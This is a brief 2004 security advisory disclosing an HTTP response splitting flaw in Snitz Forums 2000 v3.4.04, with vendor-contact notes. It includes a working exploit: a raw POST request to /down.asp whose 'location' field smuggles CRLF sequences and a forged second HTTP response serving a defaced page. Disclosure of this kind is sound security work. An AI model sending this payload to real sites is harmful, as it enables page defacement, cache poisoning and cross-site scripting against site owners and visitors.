Snitz Forums 2000 v3.4.04 suffers from an HTTP response splitting vulnerability.
088243d419f091086b2f76b1287fd453be130828c19e0fef6ca6f242e098be54
ADVISORY
Author: Maestro (me!)
Date: 16-SEP-04
Vendor: Snitz Communications (www.snitz.com)
Product: Snitz Forums 2000 v3.4.04
Product description: (from vendor website) "the leading ASP forum/bbs on the internet today"
Problem: Http response splitting (web cache poisoning, xss,
yadayadayada) - https://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
Exploit:
POST /down.asp HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-length: 134
location=/foo?%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Length:%2014%0d%0aContent-Type:%20text/html%0d%0a%0d%0a{html}defaced{/html}
(replace curly braces with lessthan and greaterthan)
Vendor status: vendor contacted several times (email to support@ and to the contact email in the code). No response from vendor.
--